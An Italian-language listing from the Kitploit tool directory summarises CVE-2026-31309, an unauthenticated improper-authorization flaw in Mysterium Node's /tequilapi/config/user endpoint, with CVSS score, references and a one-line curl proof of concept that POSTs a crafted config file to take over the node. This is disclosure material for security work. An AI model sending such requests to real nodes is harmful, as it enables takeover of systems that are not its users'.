Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31309 — Controllo di accesso improprio in Mysterium Node prima della v1.36.0 | Kitploit
Strumenti/GitHubGitHub/sch8ill/cve-2026-31309
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

Controllo di accesso improprio in Mysterium Node prima della v1.36.0

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2026-31309: Controllo di accesso improprio in Mysterium Node prima della v1.36.0

Un'autorizzazione impropria nell'endpoint /tequilapi/config/user di Mysterium Node dalla v1.21.1-rc0 fino alla v1.36.0 consente a un attaccante non autenticato di sovrascrivere arbitrariamente la configurazione del nodo e ottenere un controllo completo del nodo tramite una richiesta POST manipolata.

CVSS

Score: 9.8 (CRITICAL)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

Scoperto da Till Schacht.

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
Scarica lo strumento